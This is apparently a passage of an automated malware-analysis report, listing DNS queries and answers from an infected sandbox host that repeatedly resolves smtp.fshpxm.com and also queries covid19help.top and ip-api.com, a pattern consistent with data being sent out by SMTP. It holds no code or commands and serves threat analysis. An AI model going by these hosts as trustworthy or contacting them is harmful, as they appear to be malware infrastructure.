                                                                                      Apr 18, 2024 10:25:10.416843891 CEST192.168.2.228.8.8.80x20b1Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:10.520540953 CEST192.168.2.228.8.8.80x43d1Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:10.625507116 CEST192.168.2.228.8.8.80x43d1Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:10.731338978 CEST192.168.2.228.8.8.80x43d1Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:11.343674898 CEST192.168.2.228.8.8.80xecaeStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:11.452363968 CEST192.168.2.228.8.8.80xecaeStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:11.560230970 CEST192.168.2.228.8.8.80xecaeStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:11.665415049 CEST192.168.2.228.8.8.80xecaeStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:11.770601988 CEST192.168.2.228.8.8.80xecaeStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:12.826034069 CEST192.168.2.228.8.8.80xe2aStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:12.931303978 CEST192.168.2.228.8.8.80xe2aStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:13.036676884 CEST192.168.2.228.8.8.80xe2aStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:13.122720003 CEST192.168.2.228.8.8.80x1c21Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:13.142091036 CEST192.168.2.228.8.8.80xe2aStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:13.227844000 CEST192.168.2.228.8.8.80x1c21Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:13.247616053 CEST192.168.2.228.8.8.80xe2aStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:13.333240032 CEST192.168.2.228.8.8.80x1c21Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:13.438505888 CEST192.168.2.228.8.8.80x1c21Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:13.543540001 CEST192.168.2.228.8.8.80x1c21Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:14.176754951 CEST192.168.2.228.8.8.80x3e97Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:14.281838894 CEST192.168.2.228.8.8.80x3e97Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:14.386848927 CEST192.168.2.228.8.8.80x3e97Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:14.491825104 CEST192.168.2.228.8.8.80x3e97Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:14.596518993 CEST192.168.2.228.8.8.80x3e97Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:15.652080059 CEST192.168.2.228.8.8.80x3b5bStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:15.758512020 CEST192.168.2.228.8.8.80x3b5bStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:15.863524914 CEST192.168.2.228.8.8.80x3b5bStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:15.948753119 CEST192.168.2.228.8.8.80x128eStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:15.968429089 CEST192.168.2.228.8.8.80x3b5bStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.054028988 CEST192.168.2.228.8.8.80x128eStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.073586941 CEST192.168.2.228.8.8.80x3b5bStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.158782959 CEST192.168.2.228.8.8.80x128eStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.263794899 CEST192.168.2.228.8.8.80x128eStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.368724108 CEST192.168.2.228.8.8.80x128eStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.994009018 CEST192.168.2.228.8.8.80xfd45Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:17.098876953 CEST192.168.2.228.8.8.80xfd45Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:17.203530073 CEST192.168.2.228.8.8.80xfd45Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:17.308537006 CEST192.168.2.228.8.8.80xfd45Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:17.414278030 CEST192.168.2.228.8.8.80xfd45Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.474601984 CEST192.168.2.228.8.8.80xbe92Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.579118967 CEST192.168.2.228.8.8.80xbe92Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.684026003 CEST192.168.2.228.8.8.80xbe92Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.771708965 CEST192.168.2.228.8.8.80x82b5Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.789347887 CEST192.168.2.228.8.8.80xbe92Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.877000093 CEST192.168.2.228.8.8.80x82b5Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.894135952 CEST192.168.2.228.8.8.80xbe92Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.982201099 CEST192.168.2.228.8.8.80x82b5Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:19.086786985 CEST192.168.2.228.8.8.80x82b5Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:19.191781044 CEST192.168.2.228.8.8.80x82b5Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:19.848297119 CEST192.168.2.228.8.8.80x152eStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:19.955879927 CEST192.168.2.228.8.8.80x152eStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:20.072670937 CEST192.168.2.228.8.8.80x152eStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:20.177155018 CEST192.168.2.228.8.8.80x152eStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:20.281771898 CEST192.168.2.228.8.8.80x152eStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:21.298233032 CEST192.168.2.228.8.8.80xae52Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:21.403717041 CEST192.168.2.228.8.8.80xae52Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:21.509084940 CEST192.168.2.228.8.8.80xae52Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:21.593378067 CEST192.168.2.228.8.8.80xa706Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:21.621275902 CEST192.168.2.228.8.8.80x60b5Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:21.698740959 CEST192.168.2.228.8.8.80xa706Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:21.735538960 CEST192.168.2.228.8.8.80x60b5Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:21.803832054 CEST192.168.2.228.8.8.80xa706Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:21.848181009 CEST192.168.2.228.8.8.80x60b5Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:21.909229994 CEST192.168.2.228.8.8.80xa706Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:21.953242064 CEST192.168.2.228.8.8.80x60b5Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:22.014059067 CEST192.168.2.228.8.8.80xa706Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:22.058383942 CEST192.168.2.228.8.8.80x60b5Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:22.688958883 CEST192.168.2.228.8.8.80xb7a1Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:22.793675900 CEST192.168.2.228.8.8.80xb7a1Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:22.902527094 CEST192.168.2.228.8.8.80xb7a1Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:23.008178949 CEST192.168.2.228.8.8.80xb7a1Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:23.113344908 CEST192.168.2.228.8.8.80xb7a1Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:24.419750929 CEST192.168.2.228.8.8.80xf35aStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:24.526748896 CEST192.168.2.228.8.8.80xf35aStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:24.632158995 CEST192.168.2.228.8.8.80xf35aStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:24.737422943 CEST192.168.2.228.8.8.80xf35aStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:24.844057083 CEST192.168.2.228.8.8.80xf35aStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:25.561140060 CEST192.168.2.228.8.8.80xc557Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:25.666066885 CEST192.168.2.228.8.8.80xc557Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:25.772541046 CEST192.168.2.228.8.8.80xc557Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:25.877403975 CEST192.168.2.228.8.8.80xc557Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:25.982223034 CEST192.168.2.228.8.8.80xc557Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:27.240612030 CEST192.168.2.228.8.8.80x4a0eStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:27.345319033 CEST192.168.2.228.8.8.80x4a0eStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:27.449717045 CEST192.168.2.228.8.8.80x4a0eStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:27.554932117 CEST192.168.2.228.8.8.80x4a0eStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:27.662209034 CEST192.168.2.228.8.8.80x4a0eStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:27.773974895 CEST192.168.2.228.8.8.80xf0a9Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:27.879113913 CEST192.168.2.228.8.8.80xf0a9Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:27.984003067 CEST192.168.2.228.8.8.80xf0a9Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:28.089175940 CEST192.168.2.228.8.8.80xf0a9Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:28.195342064 CEST192.168.2.228.8.8.80xf0a9Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:28.379762888 CEST192.168.2.228.8.8.80x565aStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:28.485917091 CEST192.168.2.228.8.8.80x565aStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:28.590712070 CEST192.168.2.228.8.8.80x565aStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:28.695720911 CEST192.168.2.228.8.8.80x565aStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:28.802583933 CEST192.168.2.228.8.8.80x565aStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:31.203442097 CEST192.168.2.228.8.8.80x5debStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:31.308289051 CEST192.168.2.228.8.8.80x5debStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:31.413068056 CEST192.168.2.228.8.8.80x5debStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:31.518390894 CEST192.168.2.228.8.8.80x5debStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:31.623454094 CEST192.168.2.228.8.8.80x5debStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:34.036279917 CEST192.168.2.228.8.8.80x3b1aStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:34.143178940 CEST192.168.2.228.8.8.80x282fStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:26:32.683054924 CEST192.168.2.228.8.8.80xbe8aStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:26:32.788002014 CEST192.168.2.228.8.8.80xbe8aStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:26:32.892724991 CEST192.168.2.228.8.8.80xbe8aStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:26:32.997262955 CEST192.168.2.228.8.8.80xbe8aStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:26:33.109623909 CEST192.168.2.228.8.8.80xbe8aStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:26:35.526380062 CEST192.168.2.228.8.8.80x9447Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:26:35.631419897 CEST192.168.2.228.8.8.80x9447Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:26:35.736143112 CEST192.168.2.228.8.8.80x9447Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:26:35.840867043 CEST192.168.2.228.8.8.80x9447Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:26:35.945952892 CEST192.168.2.228.8.8.80x9447Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:26:45.269303083 CEST192.168.2.228.8.8.80xfb95Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:26:45.468240023 CEST192.168.2.228.8.8.80x87f8Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:26:45.573307991 CEST192.168.2.228.8.8.80x87f8Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:26:45.678051949 CEST192.168.2.228.8.8.80x87f8Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:26:45.783088923 CEST192.168.2.228.8.8.80x87f8Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:26:45.887870073 CEST192.168.2.228.8.8.80x87f8Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:26:48.922852993 CEST192.168.2.228.8.8.80x7fe0Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:26:49.027551889 CEST192.168.2.228.8.8.80x7fe0Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:26:49.133200884 CEST192.168.2.228.8.8.80x7fe0Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Apr 18, 2024 10:23:54.289743900 CEST8.8.8.8192.168.2.220xb979No error (0)covid19help.top104.21.83.128A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:23:54.289743900 CEST8.8.8.8192.168.2.220xb979No error (0)covid19help.top172.67.175.222A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:00.918476105 CEST8.8.8.8192.168.2.220x1d8dNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:02.735512018 CEST8.8.8.8192.168.2.220x88b4No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:02.735512018 CEST8.8.8.8192.168.2.220x88b4No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:02.735512018 CEST8.8.8.8192.168.2.220x88b4No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:02.735512018 CEST8.8.8.8192.168.2.220x88b4No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:02.735512018 CEST8.8.8.8192.168.2.220x88b4No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:02.807598114 CEST8.8.8.8192.168.2.220x2a1No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:02.807598114 CEST8.8.8.8192.168.2.220x2a1No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:02.807598114 CEST8.8.8.8192.168.2.220x2a1No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:02.807598114 CEST8.8.8.8192.168.2.220x2a1No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:02.807598114 CEST8.8.8.8192.168.2.220x2a1No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:02.878804922 CEST8.8.8.8192.168.2.220x88b4No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:02.878804922 CEST8.8.8.8192.168.2.220x88b4No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:02.878804922 CEST8.8.8.8192.168.2.220x88b4No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:02.878804922 CEST8.8.8.8192.168.2.220x88b4No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:02.878804922 CEST8.8.8.8192.168.2.220x88b4No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:02.915587902 CEST8.8.8.8192.168.2.220x2a1No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:02.915587902 CEST8.8.8.8192.168.2.220x2a1No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:02.915587902 CEST8.8.8.8192.168.2.220x2a1No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:02.915587902 CEST8.8.8.8192.168.2.220x2a1No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:02.915587902 CEST8.8.8.8192.168.2.220x2a1No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:02.984225035 CEST8.8.8.8192.168.2.220x88b4No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:02.984225035 CEST8.8.8.8192.168.2.220x88b4No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:02.984225035 CEST8.8.8.8192.168.2.220x88b4No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:02.984225035 CEST8.8.8.8192.168.2.220x88b4No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:02.984225035 CEST8.8.8.8192.168.2.220x88b4No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:03.020723104 CEST8.8.8.8192.168.2.220x2a1No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:03.020723104 CEST8.8.8.8192.168.2.220x2a1No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:03.020723104 CEST8.8.8.8192.168.2.220x2a1No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:03.020723104 CEST8.8.8.8192.168.2.220x2a1No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:03.020723104 CEST8.8.8.8192.168.2.220x2a1No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:03.089870930 CEST8.8.8.8192.168.2.220x88b4No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:03.089870930 CEST8.8.8.8192.168.2.220x88b4No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:03.089870930 CEST8.8.8.8192.168.2.220x88b4No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:03.089870930 CEST8.8.8.8192.168.2.220x88b4No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:03.089870930 CEST8.8.8.8192.168.2.220x88b4No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:03.129018068 CEST8.8.8.8192.168.2.220x2a1No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:03.129018068 CEST8.8.8.8192.168.2.220x2a1No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:03.129018068 CEST8.8.8.8192.168.2.220x2a1No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:03.129018068 CEST8.8.8.8192.168.2.220x2a1No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:03.129018068 CEST8.8.8.8192.168.2.220x2a1No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:03.241738081 CEST8.8.8.8192.168.2.220x88b4No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:03.241738081 CEST8.8.8.8192.168.2.220x88b4No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:03.241738081 CEST8.8.8.8192.168.2.220x88b4No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:03.241738081 CEST8.8.8.8192.168.2.220x88b4No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:03.241738081 CEST8.8.8.8192.168.2.220x88b4No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:03.263102055 CEST8.8.8.8192.168.2.220xe8aeNo error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:03.263102055 CEST8.8.8.8192.168.2.220xe8aeNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:03.263102055 CEST8.8.8.8192.168.2.220xe8aeNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:03.263102055 CEST8.8.8.8192.168.2.220xe8aeNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:03.263102055 CEST8.8.8.8192.168.2.220xe8aeNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:05.679852009 CEST8.8.8.8192.168.2.220x9601No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:05.679852009 CEST8.8.8.8192.168.2.220x9601No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
